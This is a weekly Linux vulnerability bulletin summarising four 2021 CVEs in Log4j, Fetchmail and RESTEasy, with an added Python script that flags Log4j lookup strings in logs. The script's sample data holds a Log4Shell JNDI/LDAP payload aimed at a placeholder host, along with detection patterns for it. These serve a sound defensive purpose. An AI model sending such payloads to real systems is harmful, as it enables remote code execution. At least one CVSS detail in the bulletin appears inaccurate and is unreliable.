Linux Vulnerabilities of the Week: December 20, 2021
See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.
1. Apache Log4j logging library vulnerability
Severity: Critical CVSS Score: 10.0
This is a flaw in Apache Log4j that allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from attacker-controlled LDAP servers when message lookup substitution is enabled.
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
Syxscore Risk Alert
This vulnerability carries a major risk: it can be exploited over any network, with low complexity, low privileges, and without user interaction. In addition, because the scope (jump point) is changed, a successful exploit can reach components beyond the vulnerable one, enabling lateral movement.
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope (Jump Point): Changed
CVE Reference(s): CVE-2021-44228
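As an added illustration that is not part of the original advisory, the following Python script applies the defensive check this entry implies: because the flaw is triggered by lookup syntax inside attacker-controlled log message content, a log review can flag any `${...}` lookup that arrives in externally supplied fields, treating lookups that name `jndi` as the highest-priority hits. The sample log lines, the documentation-range IP address and the field names are constructed for the example and are not taken from the page.

```python
import re

# Constructed sample application log lines (not from the advisory). The web
# tier copies the User-Agent and an X-Api-Version header into the log message,
# which is exactly the attacker-controlled input the Log4j flaw depends on.
SAMPLE_LOG_LINES = [
    '2021-12-11T10:02:11Z INFO  ua="Mozilla/5.0 (X11; Linux x86_64)" path=/login',
    '2021-12-11T10:02:14Z INFO  ua="${jndi:ldap://203.0.113.10:1389/a}" path=/login',
    '2021-12-11T10:02:19Z INFO  ua="curl/7.79.1" api_version="${env:HOME}" path=/api',
    '2021-12-11T10:02:25Z INFO  ua="okhttp/4.9" path=/healthz',
]

# Matches one Log4j-style lookup expression such as ${jndi:...} or ${env:...}.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def classify_lookup(text):
    """Return a severity for a single log line.

    'high'   -> a lookup naming jndi (the remote class-loading path)
    'medium' -> any other ${...} lookup syntax, which never belongs in
                externally supplied data and should be reviewed
    None     -> no lookup syntax present
    """
    found = LOOKUP_RE.findall(text)
    if not found:
        return None
    if any("jndi" in m.lower() for m in found):
        return "high"
    return "medium"


def scan_log(lines):
    """Return [(line_number, severity, [matched lookups])] for suspicious lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        severity = classify_lookup(line)
        if severity is not None:
            hits.append((number, severity, LOOKUP_RE.findall(line)))
    return hits


if __name__ == "__main__":
    for number, severity, matches in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {severity.upper()} {matches}")
```

The rule is deliberately coarse: any lookup syntax in a field populated from a request is a finding, because legitimate clients never send it, and a `jndi` lookup is escalated for immediate response. Run it over the logs of any service that logs request headers or parameters while Log4j is being upgraded.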
2. Java logging library Apache Log4j (version 1.x) flaw affecting Red Hat Enterprise Linux 8
Severity: Important CVSS Score: 8.1
JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to connect to the attacker's JMS broker.
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
Syxscore Risk Alert
This vulnerability carries a major risk: although exploitation requires a complex attack, it can be carried out over any network, without privileges and without user interaction.
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope (Jump Point): Unchanged
CVE Reference(s): CVE-2021-4104
3. STARTTLS session encryption bypassing in Fetchmail (< 6.4.22) affecting Red Hat Enterprise Linux 8
Severity: Medium CVSS Score: 5.9
Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH.
The highest threat from this vulnerability is to data confidentiality.
Syxscore Risk Alert
This vulnerability carries a major risk: although exploitation requires a complex attack, it can be carried out over any network, without privileges and without user interaction.
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope (Jump Point): Unchanged
CVE Reference(s): CVE-2021-39272
4. RESTEasy (<4.6.0.Final) vulnerability
Severity: Medium CVSS Score: 5.3
This is a flaw in all versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method's parameter value.
The highest threat from this vulnerability is to data confidentiality.
Syxscore Risk Alert
This vulnerability carries a moderate risk: it can be exploited over any network, with low complexity, low privileges, and without user interaction.
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope (Jump Point): Unchanged
CVE Reference(s): CVE-2021-20289